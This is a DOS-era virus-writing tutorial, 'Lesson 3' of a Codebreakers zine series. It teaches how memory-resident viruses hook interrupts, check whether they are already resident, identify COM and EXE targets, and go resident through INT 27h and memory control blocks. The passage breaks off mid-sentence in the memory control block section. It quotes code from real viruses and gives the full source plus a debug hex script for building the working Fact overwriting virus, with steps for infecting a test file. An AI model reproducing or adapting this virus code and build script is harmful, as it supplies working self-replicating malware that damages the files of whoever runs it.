Lesson 3 The Memory Resident Virus Primer By Horny Toad This article is the third tutorial in a series of virus writing guides written by me, Horny Toad. In the first two tutorials we discussed the two most basic forms of virii, the COM overwriting and COM appending. This tutorial will now discuss and hopefully clarify virus residency techniques and aid in the general advancement of the understanding of assembly language. As with the first two tutorials, I must explain my motives for choosing the certain style of instruction that will follow. In the first two tutorials, the subject matter was more defined in the sense that when you are dealing with very basic programs, the knowledge tree is very linear in direction. In order to explain the techniques of an overwriting virus, only the most basic of concepts need be explained. Although many of the fundamentals of assembly language were presented, no depth was taken in their explanation. I felt comfortable, for example, with leaving the explanation of the stack as a temporary memory location. In this tutorial, I will delve deeper into the usage and reasoning behind certain elements, rather than simply mentioning their existence. Now with the disclaimers and scope of the tutorial. In order to write a complete tutorial on all residency concepts and techniques, I would need to put together a book; which is currently in the conceptual stage, but we'll leave it at that. There are so many techniques which are used to make a virus resident that we will only be going over the most widely used and popular ones. As you can read from the title, this is a virus residency primer. The goal is not to make you the most advanced resident virus coder out there, quite on the contrary, with this first residency tutorial, we will survey a few of the techniques of virus residency and solidify all of the concepts needed for further study. The techniques and virii that will be presented in this tutorial are in assembly language. 
The memory discussions will be applicable to other programming languages, because we will be looking more at system design and capabilities. More specifically with assembly, the code that I use will be compatible with Borland's TASM, because that is what I use and try to convince others to switch to. In this tutorial we will only be writing real mode, 8086-compatible code. Also, although I will briefly be addressing EMS, XMS, and VMM memory manipulation, the virus techniques described will primarily be utilizing conventional memory. Due to the current status of the curriculum, we will not be covering EXE infection techniques; they will be covered in the next tutorial. Don't feel that you are getting any less of an education by limiting yourself to these concepts. The majority of the virii out there are coded using these parameters. In future installments of the Codebreakers magazines, protected mode programming on the 286, 386, 486 and Pentium processors will be discussed. Also, look for further installments on specialized memory manipulation. Right now, just learn the basics; solidify the fundamentals, then move on.

What is a memory resident virus? Quite simply, this is a virus which installs code in memory which infects future programs. In order to accomplish this, the virus must find a way to allocate memory for itself; in other words, it needs to find a place to hide. Furthermore, the virus needs to establish a procedure to activate the resident code to infect files. Within this tutorial, we will be looking at two widely used procedures for allocating memory for the virus code. The first, and most often overlooked, method is using the TSR (Terminate-Stay-Resident) services, int 27h or int 21h function 31h. Yes, there is a reason why this technique is very often overlooked. This is the least desired method of making your virus go memory resident.
While being the easiest to invoke, it is also the easiest to notice, which, when virus programming is concerned, being noticed is not always the most desired trait. The second and more desired technique is manipulation of the MCB's or memory control blocks. We will take an in-depth look at both techniques and describe the features associated with either method. Finally, in order to activate the resident code, the virus needs to hook certain interrupts. For example, if the virus is to activate every time a program is run, the int 21h function 4bh (load/execute program) interrupt needs to be hooked. Don't worry about the terminology right now, every thing will be cleared up soon enough. -------------------- INTERRUPTS -------------------- Well, let's discuss interrupts. In order to ensure that we are all on the same sheet of music, I would like to go over the interrupt procedure. I know that there are people out there who continually use interrupts in their programs, but don't actually know what is happening behind the scenes when an interrupt is processed. Every time that an interrupt is called from a program, the program execution halts and an ISR (Interrupt Service Routine) is executed. For example, if I called an int 21h function 09h, the program would halt and the called ISR would print characters to the screen, in accordance with the parameters that were passed. Once the ISR is finished printing the characters, control is handed back to the original program. In a nutshell, this is the interrupt procedure. Now, how does all of this actually work? Let's take a look at the interrupt procedure: 1. The first thing that the computer must do when an interrupt is called is to save the current state of the host program. It does this by pushing the contents of the flags register onto the stack. In keeping with the 8086 parameters of this tutorial, the flags register is a 16-bit register in charge of indicating the current status of the computer and its processes. 
Each of the flags is used for testing a certain condition relevant to program processing. Since we are only concerned with real mode programming, only 9 of the flags affect our operations.

2. Speaking of flags, the next thing that the computer does when processing an interrupt is to clear two of them, the interrupt flag (IF) and the trap flag (TF). The interrupt flag disables maskable hardware interrupts when set to 0, and enables them when set to 1. When the trap flag is set, the processor executes in single-step mode, one instruction at a time. Don't worry too much about understanding flag testing and manipulation; just be aware of what is happening behind the scenes.

3. The next step that the computer takes is to push the CS register onto the stack. The CS contains the segment address of the program's code segment. Remember from previous tutorials that, when the push instruction is used, the SP (Stack Pointer) decrements by 2 before transferring the word onto the stack.

4. The next operation that occurs is the pushing of the IP (Instruction Pointer). Combined with the CS (CS:IP), the IP gives the address of the next instruction to be executed in the host program.

5. The processor is now ready to pass control to the ISR (Interrupt Service Routine). In order to find the location of the ISR, the IVT (Interrupt Vector Table) must be referenced. The 8086 system contains 256 different interrupts, numbered 0-255. The IVT is an array of 256 pointers, one per interrupt, located at address 0000:0000. Each of the pointers in the IVT is 4 bytes long, or 2 words: the offset of the ISR in the first word, followed by its segment in the second. This is important to know and will be referenced later when we talk about direct manipulation of the IVT. The pointer found in the IVT is loaded into CS:IP and the ISR is executed.

Once the ISR has been completed, the computer needs to recover and transfer control back to the host program.
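The five entry steps above can be sketched as a small Python model. This is only an illustration under stated assumptions, not how any real emulator is written: the class name Cpu, the starting register values and the handler address 0019:1460 are all made up for the example. The iret method shows the return path, which simply pops the three words back in the reverse order.

```python
# Minimal model of 8086 real-mode interrupt entry and return (illustrative only).
IF_MASK = 0x0200  # interrupt flag, bit 9 of the flags register
TF_MASK = 0x0100  # trap flag, bit 8 of the flags register


class Cpu:
    def __init__(self):
        self.memory = bytearray(0x100000)    # 1 MB real-mode address space
        self.cs, self.ip = 0x1000, 0x0105    # hypothetical host program position
        self.ss, self.sp = 0x1000, 0xFFFE    # hypothetical stack position
        self.flags = 0x0202                  # IF set; bit 1 always reads as 1

    def linear(self, segment, offset):
        # segment:offset pair to 20-bit physical address
        return (segment * 16 + offset) % 0x100000

    def read_word(self, segment, offset):
        a = self.linear(segment, offset)
        return self.memory[a] + self.memory[a + 1] * 256   # little-endian

    def write_word(self, segment, offset, value):
        a = self.linear(segment, offset)
        self.memory[a] = value % 256
        self.memory[a + 1] = (value // 256) % 256

    def push(self, value):
        self.sp = (self.sp - 2) % 0x10000    # SP is decremented by 2 first
        self.write_word(self.ss, self.sp, value)

    def pop(self):
        value = self.read_word(self.ss, self.sp)
        self.sp = (self.sp + 2) % 0x10000
        return value

    def interrupt(self, number):
        self.push(self.flags)                          # step 1: save flags
        self.flags &= ~(IF_MASK | TF_MASK) & 0xFFFF    # step 2: clear IF and TF
        self.push(self.cs)                             # step 3: save CS
        self.push(self.ip)                             # step 4: save IP
        slot = number * 4                              # step 5: IVT entry address
        self.ip = self.read_word(0, slot)              # offset is the first word
        self.cs = self.read_word(0, slot + 2)          # segment is the second word

    def iret(self):
        self.ip = self.pop()
        self.cs = self.pop()
        self.flags = self.pop()


cpu = Cpu()
cpu.write_word(0, 0x21 * 4, 0x1460)        # hypothetical ISR offset
cpu.write_word(0, 0x21 * 4 + 2, 0x0019)    # hypothetical ISR segment
cpu.interrupt(0x21)
print("in ISR at %04X:%04X, SP=%04X" % (cpu.cs, cpu.ip, cpu.sp))
cpu.iret()
print("back at   %04X:%04X, SP=%04X" % (cpu.cs, cpu.ip, cpu.sp))
```

The model treats IP as already pointing at the instruction after the INT, which is what the real processor pushes.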
The procedures taken to initialize the interrupt are essentially reversed through the execution of an IRET instruction. The IRET instruction pops the word at the top of the stack into the IP. The SP is then incremented and the new word at the top of the stack is popped into CS, followed by the same procedure for the flags register. When writing your own ISR's, remember to save all registers and flags that might be changed during the execution of the ISR. On the flip side, remember to restore all of the registers from the stack once the routine is over. It's a good practice to keep a pen and paper next to you so that you can record which registers you have pushed onto the stack. You can then have an easy reference when it comes time to pop them off the stack, in the reverse order. You will see in a majority of virii that virus writers like to push all the registers, including the flags register, at the beginning of their ISR. This can be a good safety procedure just to make sure that your ISR doesn't change anything it shouldn't. For a good example of the amount of register changes that occur in your average code, trace your virus through debug and watch all of the changes that occur.

I realize that this is quite a mouthful just for the description of an interrupt procedure. It is, however, important to know when writing your own ISR's and manipulating the interrupt process. Care needs to be taken to ensure that the same procedure is followed when custom ISR's are used.

-------------------------------------------------
Manipulating the Interrupt Vector Table
-------------------------------------------------

Now that we have discussed what an interrupt does, we need to look at the process of changing the interrupt vector table (IVT) to point to our custom interrupt service routine (ISR). The process of changing an interrupt or capturing the interrupt function is also known as "hooking" an interrupt.
There are two DOS functions in place which allow for manipulation of the IVT. Calling these two functions with the correct parameters will allow the IVT to point to your virus code. Some virus writers prefer to directly change the IVT by figuring out the actual address of the interrupt pointer. The two functions which provide automatic IVT manipulation are:

INT 21h Function 35h: Get Interrupt Vector

        mov ah,35h
        mov al,int#        ;desired interrupt number
        int 21h

and

INT 21h Function 25h: Set Interrupt Vector

        mov ah,25h
        mov al,int#        ;desired interrupt number
        lea dx,new         ;new interrupt address (DS:DX)
        int 21h

When the first function is called, the result of the query, the ISR segment:offset, is returned in ES:BX. You therefore need to save the result so that the original ISR can be called from your code once your custom ISR has completed execution. There is no "one" way to tell you how to use the "get interrupt vector". Many virus writers save their results in different ways. Some people use delta offsets in their resident routines, some don't. Everyone has their own method of writing a residency routine, which gives the code its own unique feature. I have included below some examples taken directly from virus code to illustrate the different styles in handling this function.
mov ax,3521h int 21h ;store the int 21 vectors mov word ptr [bp+int21],bx ;in cs:int21 mov word ptr [bp+int21+2],es ------------------------------------------ MOV AX,3516H ; Get interrupt 16H INT 21H ; DOS service (Get int) MOV I16OFF,BX ; Save interrupt 16H offset MOV I16SEG,ES ; Save interrupt 16H segment ------------------------------------------ mov ax,3521h ;set ax to get INT 21 vector address int 21h ;get INT 21 vector mov [WORD int21trap+1+0100h],bx ;store address in viral code mov [WORD int21trap+3+0100h],es ;store segment in viral code ------------------------------------------ push es pop ds mov ax,3521 ;get original int21 vector int 21 mov ds:[oi21],bx mov ds:[oi21+2],es Once you have saved the original ISR, you need to then change the IVT to point to your custom ISR. The offset of the beginning section of the virus ISR is loaded into DX and the int 21 function 25h is called. The other way of manipulating the IVT is through direct manipulation. Direct manipulation is when you access the IVT directly at its location 0000:0000. Just as with the previous method, you will see many different methods of changing the IVT directly. As long as you understand the principle of the technique, you can choose however you want to change the IVT. Just be careful that you know where the IVT is currently located. When in doubt, let DOS find it for you. Well on to the technique. xor ax,ax mov ds,ax mov ax,offset myintXXh cli xchg word ptr ds:[XXh*4],ax mov word ptr cs:[oldintXX],ax mov ax,cs xchg word ptr ds:[XXh*4+2],ax mov word ptr cs:[oldintXX+2],ax sti push cs pop ds So, what are we doing here? Initially, we need to set the DS register to point to the IVT at address 000:000. We do this by clearing the accumulator register (AX) to zero using the exclusive OR (XOR) instruction. Once AX equals zero, we then move AX into DS. 
This might seem a little tedious; just remember that there is no instruction that moves an immediate value directly into a segment register, so the value has to go through a general register such as AX first. The next instruction is fairly straightforward. The offset of "myintXXh" (where XXh is the interrupt which we are changing) is loaded into AX. "MyintXXh" is the location of my ISR routine. The following instruction, CLI, clears the interrupt flag (IF), which in turn disables maskable hardware interrupts. This is a safety procedure to ensure that no interrupts are processed while the IVT entry is only half changed. The rest of the code is pretty self-explanatory. Essentially, what you need to do is multiply the interrupt number by 4 to get the address of the pointer to the ISR. Remember that each of the pointers in the IVT is 4 bytes long, or 2 words, consisting of an offset followed by a segment. For int 21h, for example, the offset word is at 0000:0084 (21h*4) and the segment word is at 0000:0086. The above code does not take into account any further offsets that might be applicable to your code. There are many styles of writing IVT manipulation routines. You will just have to find the type that you want to use and go for it.

---------------------------------
Self-Recognition
---------------------------------

Hardly warranting an entire section, an important aspect of a memory resident virus is being able to determine whether or not its code is already resident. If a virus does not perform a check for previous residency installation, the consequences can be disastrous. Bottom line, check whether you are already in memory. This is typically accomplished by issuing a bogus function call to the interrupt that your virus handles. For example, if your virus hooks int 21h, the ISR needs to contain a check that answers such a call, so that a newly run copy can recognize the copy that is already resident. Many virus writers tend to load AX with an outrageous value and perform an int 21h. The virus ISR would then perform a check of AX when it receives the interrupt. If the virus is already resident, control is passed back to the host.
If not, the next instruction in the virus would be to start the infection procedure. Whenever you talk to me about virus programming, I will always push Ralf Brown's interrupt list. Simply put, it's a fantastic tool for assembly programming. Cruise around the int 21h portion of his list and you will see many virus installation check entries. These are interrupts that have been "created" by the virus writers for self-recognition checks. Take a look at the example below. I have included a cut from Brown's list of int 21h function 33dah. This is a bogus function other than being used by the CoffeeShop Virus for self-recognition. Below this cut, you can see a portion from the beginning of the CoffeeShop Virus. The virus calls int 21 function 33da. Now look at the portion of the int 21h handler that I have included, which checks to see if the int 21h call included 33da loaded in AX. If so, the virus will simply transfer control back to the host. If not, it hooks the interrupts and continues with the infection process. --------v-2133DA------------------------ INT 21 - VIRUS - "CoffeeShop" - INSTALLATION CHECK AX = 33DAh Return: AH = A5h if resident AL = virus version SeeAlso: AX=330Fh,AX=33E0h,AX=5643h"VIRUS" Taken from the beginning of the CoffeeShop Virus ---------------------------------------------------- mov ax,33DA ;already resident? int 21 cmp ah,0A5 je not_install ---------------------------------------------------- Int 21h handler taken from CoffeeShop Virus ---------------------------------------------------- ni21: pushf cmp ax,33DA ;install-check ? jne not_ic mov ax,0A500+VERSION ;return a signature popf iret ---------------------------------------------------- --------------------------------------- Is it a COM file? --------------------------------------- In the interest of learning something new, lets take a look at another way to determine whether or not a file, that is opened, is a COM file. 
In the next tutorial, we will be going over EXE infection, but currently your virii need to know if the file that is being executed is a COM file. You already know how to "find first file" with the COM extension, but what do you do when the virus intercepts all files that are using the function 4bh? I have included a cut from Dark Helmet's Civil War II Virus, which demonstrates a good technique for scanning the ASCIIZ string for the COM extension. By the way, someone once asked me what the hell an ASCIIZ string is. An ASCIIZ string is a string of ASCII characters that is terminated by a single zero byte (00h), a good example being the string that many virii use for determining file type, the file name string at 1eh of the disk transfer area (DTA). Take a look at the code below, then I will discuss it.

check_exec:     cmp ax,04b00h                   ; exec function?
                je chk_com

chk_com:        mov cs:[name_seg-6],ds
                mov cs:[name_off-6],dx
                cld                             ; check extension
                mov di,dx                       ; for COM
                push ds
                pop es
                mov al,'.'                      ; search extension
                repne scasb                     ; check for 'COM'
                cmp word ptr es:[di],'OC'       ; check 'CO'
                jne continu
                cmp word ptr es:[di+2],'M'      ; check 'M'
                jne continu

The heart of the above code is the instruction "repne scasb". Essentially what this operation does is scan the given data until it hits the "." of the filename extension. It then does a simple read of the extension to check whether it is a COM file. Now let's talk about it more in depth. What is a better way of reading this instruction? Probably, repeat scan string until first byte match. Boy, that's a mouthful. The "repne" means repeat while not equal, in other words, find the first match. If you see "repe", that means repeat while equal, or find the first non-match. In both cases the repetition also stops when CX, which is decremented on every pass, reaches zero. As far as the "scasb", AL needs to be loaded with the byte value that you want to scan for. Each pass compares AL with the byte at ES:DI and then moves DI on to the next byte, so when the scan stops on a match, DI is pointing at the byte just after the ".", which is the first letter of the extension. Now back up a few lines. The cld instruction (C)lears the (D)irection (F)lag. In string operations, this causes DI to be incremented, so the scan goes from left to right, from lower addresses to higher ones. If DF is left set to 1, then DI would be decremented and the scan would go from right to left.
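To make the behaviour of "repne scasb" with the direction flag cleared easier to follow, here is a rough Python model of the scan and of the two word compares that follow it. It is a sketch only: the function names are invented for this example, and the count passed in stands for CX, which the excerpt above does not show being loaded.

```python
def repne_scasb(memory, di, al, cx):
    """Model REPNE SCASB with DF=0.

    Compares AL with memory[di], advances DI and decrements CX on every
    pass, and stops at the first match or when CX reaches zero.
    Returns (di, cx, zf) as the registers and zero flag would be left.
    """
    zf = False
    while cx != 0:
        byte = memory[di]
        di += 1              # DI moves forward after each comparison (DF = 0)
        cx -= 1
        zf = (byte == al)
        if zf:
            break            # REPNE ends on the first equal byte
    return di, cx, zf


def has_com_extension(asciiz):
    """Return True if the ASCIIZ file name ends in '.COM' plus the zero byte."""
    di, cx, zf = repne_scasb(asciiz, 0, ord('.'), len(asciiz))
    if not zf:
        return False         # no '.' found at all
    # Same test as the two word compares: 'C','O' then 'M',00h
    return asciiz[di:di + 4] == b'COM\x00'


for name in (b'C:\\DOS\\FORMAT.COM\x00', b'PROG.EXE\x00', b'NOEXT\x00'):
    print(name, has_com_extension(name))
```

Note that, like the original compare of a whole word against 'M', the model only accepts an extension whose "M" is directly followed by the terminating zero byte.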
All that remains is to compare the string remaining with the COM extension. Another commonly used method to identify if the program is an EXE file is looking for the MZ string at the beginning of the EXE file header. MZ are the initials of Mark Zbikowski, the programmer who designed the EXE file format. The first two bytes of the EXE file header, at offset 0, are 4Dh 5Ah, the letters "M" and "Z". Because the 8086 stores the low byte of a word first, those two bytes read back as the word 5A4Dh, which is why the compare in the code is written as "ZM". Below, I have included an example of this operation. After the file is opened, read a chunk into a buffer and compare the word at the beginning of the buffer with the EXE signature, "ZM".

        mov ax,3d02h
        int 21h
        xchg ax,bx
        mov ah,3fh
        lea dx,[bp+offset buffer]
        mov cx,1Ah
        int 21h
        cmp word ptr [bp+buffer],'ZM'

---------------------------------------
Going Resident using INT 27h
---------------------------------------

No tutorial on resident virus writing is complete without addressing the DOS TSR interrupt. Many virus writers would disagree on this point, hoping that, if they don't talk about it, maybe it will just go away. When I used to live in Germany, the taboo subject was the Nazis. I kept telling my German friends to just deal with it, accept that it happened, and drive on. Int 27h was created, it's still alive, deal with it. So, what is this monster, int 27h? What does it do that is so terribly wrong? Let's take a look.

* - I must mention that when I am discussing the int 27h method of going resident, I am also generally referring to its sister interrupt, int 21h function 31h. Both essentially accomplish the same end result, but are utilized slightly differently.

Int 27h, quite simply, is the easiest and fastest way to write a resident routine. Within a COM program, when int 27h is called, the program halts execution (Terminates), but the code stays in memory (Stay Resident). The problem that arises with usage of this interrupt is that, after the program has terminated and gone resident, the program execution stops.
Therefore, when an infected program is executed, the computer does become infected by the virus, but the program user is alerted to the virus due to the suspicious activity of the program halting. Granted, if the person re-executed the program, it would then run normally, as long as the virus code contained a self-recognition routine. Let's even take a closer look at int 27h. Why does the COM file cease execution once the int 27h is issued? What is it actually doing? Well, to answer the first question, the writers of the actual interrupts didn't properly consult us virus writers, hence the reason for the "Terminate" portion of the ISR. Many of the non-virus TSR's that are written are utilities designed to intervene in the background when a specific event or condition takes place. The programmers of these TSR's could care less whether or not their utility continues to execute after the int 27h is issued, mainly because the entire code is the actual utility to be loaded. When the int 27h is issued, DOS retains all memory occupied up to CS:DX, then passes control to COMMAND.COM. This is an important fact when using int 27h. Remember to move the offset into DX of the last line that you want loaded into memory, just prior to issuing the interrupt. When you are programming your virus using int 27h, the beginning of the resident portion of the code is defined in the offset of the new interrupt vector, or DX when using int 21h function 25h. I know that without an example to look at, this all probably seems very confusing. In choosing a virus to show you of this technique demonstrated, I wanted to find a very small virus. I choose to use the Fact Virus. As with most of the demonstration virus code that I put in my tutorials, the code is heavily unoptimized and basic. I choose to include it because of its small size and usage of the basic techniques of int 27h residency. The virus does work. 
I will guide you through the process of running the virus after we look at its structure. .model tiny .code org 100h code_begin: mov ax,3521h int 21h mov word ptr [int21_addr],bx mov word ptr [Int21_addr+02h],es mov ah,25h lea dx,int21_virus int 21h xchg ax,dx int 27h int21_virus proc near cmp ah,4bh jne int21_exit mov ax,3d01h int 21h xchg ax,bx push cs pop ds mov ah,40h mov cx,(code_end-code_begin) lea dx,code_begin int21_exit: db 0eah code_end: int21_addr dd ? virus_name db '[Fact]' endp end code_begin I would hope that you understand the majority of this virus code. I specifically choose a very small virus to prove that a TSR virus does not have to be 10+ pages in order to work. Yes, the Fact virus does need to contain a few more functions in order to make it an effective virus, but it does work. When you look at this virus, you need to actually separate the code into two pieces. The first piece is the administrative section, beginning with "code_begin". The second piece of code is the int21_virus procedure. The second portion of code is never executed during the first run of the virus. The only thing that this virus does, on initial run, is change the IVT and make the virus TSR. Try to visualize in your mind what the ISR looks like in memory. Whenever an int 21h is issued, control must go through this virus. The only thing that this virus does is stay dormant in memory until the int 21h function 4bh (load/execute program) is initiated. It then crudely overwrites the program with it's own code. Something that you should be aware of when you study virus code is the use of the object code "0eah" directly before the interrupt storage area. Remember when we programmed an appending virus and used the "db 0eh,0,0" at the beginning of the program. All we are doing is coding a specific instruction directly into the program. "0eah" or in binary 11101010 is simply the object code for a direct intersegment, or far jump. 
In this case, the far jump is to the address of the original ISR, int 21h. Let's infect ourselves with the fact virus. The Fact virus is a very small weak virus. Follow my simple instructions below and nothing will go wrong. There are many readers of this tutorial who, for some reason, do not receive the entire magazine. Therefore, I will include the debug script for the Fact virus below, so that you can play with it even if you did not receive the entire Codebreakers magazine. For those of you who do have the magazine, 3rd edition, you can find all of the necessary programs in the Cdbkutl folder. In order to get a functioning virus from the below code you need to find your copy of debug. Cut the below code out and save it to a file called fact.txt. Then, at a cursor, with debug in the same directory,type: debug < fact.txt N FACT.COM E 0100 B8 21 35 CD 21 89 1E 2D 01 8C 06 2F 01 B4 25 BA E 0110 17 01 CD 21 92 CD 27 80 FC 4B 75 10 B8 01 3D CD E 0120 21 93 0E 1F B4 40 B9 2D 00 BA 00 01 EA 00 00 00 E 0130 00 5B 46 61 63 74 5D RCX 0037 W Q If you need a dummy file to infect, follow the same procedure above for fly.com. Fly.com is a small COM file that does absolutely nothing. N FLY.COM E 0100 B4 4C B0 00 CD 21 RCX 0006 W Q Exit to DOS. Windows gets funny with TSR's. Once both of the files are in the same directory, type "fact". The virus will now be installed into memory. Type "dir" to see the contents of the directory. Note the file lengths of fact and fly, 55 and 6. Now type "fly". In order to execute the program, int 21 function 4bh is initiated. The virus overwrites the fly program in the new ISR. Now type "dir" again. Notice that the length of fly is now increased to 45. Pretty cool, huh? You can reboot your system now just to make sure that the virus is clear from memory. Well, that is int 27h in a nutshell. There are many different techniques that can be utilized when playing around with int 27h. 
Some programmers like to attach the TSR routine to the end of the virus and specify the beginning of code going into memory. Some prefer to prepend the virus to the beginning of the program so that it is easier to calculate the TSR routine parameters. By the way, as I said previously, for the most part int 27h can be interchanged with int21 function 31h. It is just easier, when using programs under 64k, to use int 27h. If you would like to use int 21h function 31h, follow the code below: mov ah, 31h mov dx,size (in paragraphs) int 21h Example of function 31h: By the way, the code below is not a virus, rather a simple demonstration of a resident program. Wart.com hooks the keyboard interrupt (int 09h). When the program is resident, every time you push the `h' or `t' (or `H' or `T'), you will hear a beep. Don't worry about the instructions that you don't understand, just look at the structure of the routine that makes the code go resident. code segment assume cs:code, ds:code org 100h vlength equ (resi_leap-start+15)/16 start: jmp resi_leap old_int9 dd ? my_int9: push ax push cx push ds in al,60h cmp al,35 je wart_growth cmp al,104 je wart_growth cmp al,20 je wart_growth cmp al,116 je wart_growth jmp bye_bye wart_growth: mov al,192 out 43h,al mov ax,1000 out 42h,al mov al,ah out 42h,al in al,61h mov ah,al or al,03 out 61h,al mov cx,19000 pause: loop pause mov al,ah out 61h,al bye_bye: pop ds pop cx pop ax jmp cs:old_int9 ;-----------Below this is the code responsible for going resident ;-----------and hooking int 09h. 
Everything above this is what ;-----------stays resident, my new ISR for int 09h resi_leap: cli mov ax,3509h int 21h mov word ptr old_int9,bx mov word ptr old_int9+2,es mov ax,2509h mov dx,offset my_int9 int 21h mov ah,31h mov dx,vlength sti int 21h code ends end start N WART.COM E 0100 EB 43 90 00 00 00 00 50 51 1E E4 60 3C 23 74 0F E 0110 3C 68 74 0B 3C 14 74 07 3C 74 74 03 EB 1F 90 B0 E 0120 C0 E6 43 B8 E8 03 E6 42 8A C4 E6 42 E4 61 8A E0 E 0130 0C 03 E6 61 B9 38 4A E2 FE 8A C4 E6 61 1F 59 58 E 0140 2E FF 2E 03 01 FA B8 09 35 CD 21 89 1E 03 01 8C E 0150 06 05 01 B8 09 25 BA 07 01 CD 21 B4 31 BA 45 01 E 0160 FB CD 21 48 6F 72 6E 79 20 54 6F 61 64 21 0A 0D RCX 0070 W Q ------------------------------- Memory Control Blocks ------------------------------- In order to have any understanding of what a memory control block (MCB) is, we must first have a discussion about memory. As you remember in the beginning of this tutorial, we are only going to be discussing real mode 8086 programming. This, in a sense, limits the scope of memory that we can utilize. What part of memory can we use? In real mode programming, we are restricted to memory below 1 MB. The area below 1 MB can be further divided into 2 sections, conventional and upper memory. Above 1 MB lies the extended and high memory, which will be addressed in future tutorials. This is what it looks like. Conventional Memory - 0 to 640k Upper Memory - 640k to 1 MB Extended memory - Addressed above High Memory - 1 MB Typically, most virus writers will confine their memory utilization to conventional memory. When you hear people say that they are loading their virus high, it usually means that they are loading their virus into the higher portion of conventional memory. Conventional memory is divided up into blocks of memory. Each block of memory is "described" by a memory control block, or MCB. 
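The 1 MB limit and the 640k boundary mentioned above both follow from how real mode builds an address: the 16-bit segment is multiplied by 16 (one paragraph) and the 16-bit offset is added. The short Python sketch below works a few addresses through that arithmetic. The function names and the sample addresses are only chosen for illustration.

```python
CONVENTIONAL_TOP = 640 * 1024      # 0A0000h, the end of conventional memory
ONE_MB = 1024 * 1024               # 100000h, the end of the real-mode address space


def linear_address(segment, offset):
    """Turn a real-mode segment:offset pair into a physical address."""
    return segment * 16 + offset


def region(address):
    """Name the memory area, as listed above, that an address falls in."""
    if address >= ONE_MB:
        return "above 1 MB"
    if address >= CONVENTIONAL_TOP:
        return "upper memory"
    return "conventional memory"


samples = [
    (0x0000, 0x0084),   # the int 21h entry in the IVT
    (0x9FFF, 0x000F),   # last byte of conventional memory
    (0xA000, 0x0000),   # first byte of upper memory
    (0xFFFF, 0x000F),   # last byte below 1 MB
    (0xFFFF, 0x0010),   # first byte above 1 MB
]
for seg, off in samples:
    addr = linear_address(seg, off)
    print("%04X:%04X = %06X  %s" % (seg, off, addr, region(addr)))
```

Because a segment value counts paragraphs, adding 1 to a segment register moves the address forward by 16 bytes, and subtracting 1 moves it back by 16 bytes.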
Depending on who you talk to, the MCB will also be referred to as the memory arena or arena header, but the virus writing convention is to use the term MCB. At the beginning of each block of memory, DOS creates a one-paragraph (16-byte) header, which describes certain attributes of the block. Keep in mind that the memory blocks themselves are divided into 16 byte memory paragraphs. As the blocks of memory are allocated by DOS for program use, the MCB's describe how the actual block of memory is being used. An MCB is located immediately before the block of memory it describes. All of the MCB's together are referred to as the MCB chain. Each MCB in the chain has a status, M or Z. M status denotes that the MCB is located within the chain and that another MCB follows it, while Z is the status of the last MCB in the chain. This all might sound a bit confusing, but it isn't.

        -----------------
        -      MCB      -
        -----------------
        -   Block of    -
        -    Memory     -
        -----------------
        -      MCB      -
        -----------------
        -   Block of    -
        -    Memory     -
        -----------------
        -      MCB      -
        -----------------
           and so on..

Let's take a look at the information that can be found within an MCB.

MCB Structure

Offset    Size    Description
--------------------------------------------------------
0         1       MCB status (M or Z)
1         2       PSP segment of owner
3         2       Memory block size (in paragraphs)
5         3       Not used
8         8       Program filename

To better visualize what the MCB's are, I wrote a small program which traces up the MCB chain, extracting certain data and displaying it to the screen. Under the directory Cdbkutl in the 3rd edition of the Codebreakers Zine, you will find the program "CB-MCB.EXE". Run this program to see a demonstration of the MCB chain on your computer. This program contains NO virus code, just a simple demo of the useful data that can be found in an MCB. You will notice that the PSP segment is located at offset 1. I really don't want to explain what the PSP is again; I have already touched upon it in previous tutorials.
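As a rough illustration of the table above, the Python sketch below reads the fields of an MCB out of a block of bytes and follows the chain from one header to the next. It is not the CB-MCB program, and it runs on a small made-up memory image rather than on real DOS memory: the helper make_mcb, the segment numbers, the owner values and the name DEMO are all invented for the example.

```python
def parse_mcb(memory, segment):
    """Decode the 16-byte MCB that starts at segment:0000."""
    base = segment * 16
    return {
        "segment": segment,
        "status": chr(memory[base]),                                       # offset 0
        "owner": int.from_bytes(memory[base + 1:base + 3], "little"),      # offset 1
        "paragraphs": int.from_bytes(memory[base + 3:base + 5], "little"), # offset 3
        "name": bytes(memory[base + 8:base + 16]).split(b"\x00")[0].decode("ascii", "replace"),
    }


def walk_chain(memory, first_segment):
    """Follow the chain from the first MCB until the one marked 'Z'."""
    blocks = []
    segment = first_segment
    while True:
        mcb = parse_mcb(memory, segment)
        if mcb["status"] not in ("M", "Z"):
            raise ValueError("corrupt MCB chain at segment %04X" % segment)
        blocks.append(mcb)
        if mcb["status"] == "Z":
            return blocks
        # The next MCB sits right after this header (1 paragraph) and its block
        segment += mcb["paragraphs"] + 1


def make_mcb(memory, segment, status, owner, paragraphs, name=b""):
    """Write a hypothetical MCB into the image (test helper, not a DOS call)."""
    base = segment * 16
    memory[base] = ord(status)
    memory[base + 1:base + 3] = owner.to_bytes(2, "little")
    memory[base + 3:base + 5] = paragraphs.to_bytes(2, "little")
    memory[base + 8:base + 16] = name.ljust(8, b"\x00")[:8]


image = bytearray(0x2000)                       # small made-up memory image
make_mcb(image, 0x0100, "M", 0x0008, 0x0010)            # block owned by DOS
make_mcb(image, 0x0111, "M", 0x0112, 0x0020, b"DEMO")   # block owned by a program
make_mcb(image, 0x0132, "Z", 0x0000, 0x00CD)            # free block, end of chain

for block in walk_chain(image, 0x0100):
    print("%(segment)04X  %(status)s  owner=%(owner)04X  size=%(paragraphs)04X  %(name)s" % block)
```

The step "segment += paragraphs + 1" is the whole trick: the size field counts only the block, so one extra paragraph is added for the header itself.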
Just to refresh your memory, when the program loader is loading a program into a segment for execution, it creates a 256-byte program segment prefix. Along with the MCB, many useful bits of information can be derived from the PSP. Ralf Brown, with whom you all should be familiar with, has created a beautiful diagram of the PSP. I have included it at the end of this tutorial, take a look. Now that you have a taste of what the MCB's are, let's discuss techniques used in MCB manipulation in order to allocate memory for your virus code. Remember when I discussed the definitions of a resident virus? We have already discussed how to hook interrupts for activating your virus code. The other factor in resident programming is making your virus go resident. We have already looked at the int 27h method of residency, now we will look at allocating memory through DOS functions and manipulating MCB's. Please tell me to stop making these awful pictures. Below is a simple diagram of what we want to accomplish with the MCB method of virus infection. Take a look at the memory diagram before infection. The host program has been allocated all available memory. What are virus will attempt to do is shrink the amount of memory that the host program has, then allocate enough memory for itself and move into that memory space. Before After Infection Infection ------------------ ----------------- - MCB - - MCB - ------------------ ----------------- - Block of - - Block of - - Memory - - Memory - ----------------- ----------------- - MCB - - MCB - ----------------- ----------------- - Program - - Program - - - - - - - - - - - - - - - ----------------- - - - MCB - - - ----------------- - - - Virus - ------------------ ----------------- Top of Memory Top of Memory The important interrupts for use in memory 